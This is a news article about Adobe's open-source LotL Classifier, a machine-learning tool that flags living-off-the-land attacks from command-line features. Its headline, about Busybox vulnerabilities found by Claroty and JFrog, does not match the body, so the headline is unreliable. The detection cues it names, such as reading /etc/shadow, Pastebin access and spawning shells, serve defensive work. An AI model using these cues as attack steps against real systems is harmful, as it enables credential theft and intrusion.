Claroty and JFrog discover 14 vulnerabilities in Busybox - SecurityBrief New Zealand

Attackers who use standard system commands during a compromise a technique known as living off the land (LotL) to avoid detection by defenders and endpoint security software may find their activities in the spotlight if a machine learning project open sourced by software firm Adobe this week bears fruit.

The project, dubbed LotL Classifier, uses supervised learning and an open source dataset of real-world attack to extract features of specific commands and then classifies the command based on a features extracted using human analysis as a model. Those features are then used to determine whether the command is good or bad and to label the command with a set of tags that can be used for anomaly detection.

Each feature by itself such as accessing the /etc/shadow directory, where passwords hashes are typically stored, or access to Pastebin may seem suspicious, but usually are not malicious, says Andrei Cotaie, technical lead for security intelligence and engineering at Adobe.

"On their own, most of the tags or tag types have a high FP [false positive] rate, but combining them and feeding this combination through the machine learning algorithm can generate a higher rate of accuracy in the classifier," he says, adding that Adobe has benefited from the machine learning model. "The LotL Classifier is operational in our environment and based on our experience, by suppressing reoccurring alerts, the LotL Classifier generates a few alerts per day."

Living off the land has become a widely used attacker tactic when targeting enterprises. Malware attacks are just as likely to begin with a PowerShell command or Windows Scripting Host command two common administrative tools that can escape notice than as a more traditional malware executable. In 2019, CrowdStrike's incident response group found that "malware-free" attacks, another name for LotL, surpassed malware-based incidents. By the summer of 2021, they accounted for more than two-thirds of investigated incidents.

"Attackers are increasingly attempting to accomplish their objectives without writing malware to the endpoint, using legitimate credentials and built-in tools (living off the land) which are deliberate efforts to evade detection by traditional antivirus products," CrowdStrike stated in its "2021 Threat Hunting Report."

The LotL Classifier uses a supervised machine learning approach to extract features from a dataset of command lines and then creates decision trees that match those features to the human-determined conclusions. The dataset combines "bad" samples from open source data, such as industry threat intel reports, and the "good" samples come from Hubble, an open source security compliance framework, as well as Adobe's own endpoint detection and response tools.

The feature extraction process generates tags focused on binaries, keywords, command patterns, directory paths, network information, and the similarity of the command to known patterns of attack. Examples of suspicious tags might include a system-command execution path, a Python command, or instructions that attempt to spawn a terminal shell.

"The feature extraction process is inspired by human experts and analysts: When analyzing a command line, people/humans rely on certain cues, such as what binaries are being used and what paths are accessed," Adobe stated in its blog post. "Then they quickly browse through the parameters and, if present in the command, they look at domain names, IP addresses, and port numbers."

Using those tags, the LotL Classifier uses a random-forest tree model that combines several decision trees to determine whether the code is malicious or legitimate.

"Interestingly, these stealthy moves are exactly why it's often very difficult to determine which of these actions are a valid system administrator and which as are an attacker," the company stated in a blog post.

The machine learning model can benefit companies in a variety of threat-analysis pipelines, says Adobe's Cotaie. Threat hunters could use it as a local service or the model could process global security information and event management (SIEM) data to find anomalies by feeding another open source tool released by Adobe, the One-Stop Anomaly Shop (OSAS). The model has a component for Windows systems and a separate one for Linux, but it's otherwise context independent.

"The classifier is integrated into ... One Stop Anomaly Shop (OSAS)," he says. "The parent project can model local or group system behavior using many context-dependent features and its anomaly detection features are complementary to the LotL classifier model."

Read the original post:

Open Source Project Aims to Detect Living-Off-the-Land Attacks - Dark Reading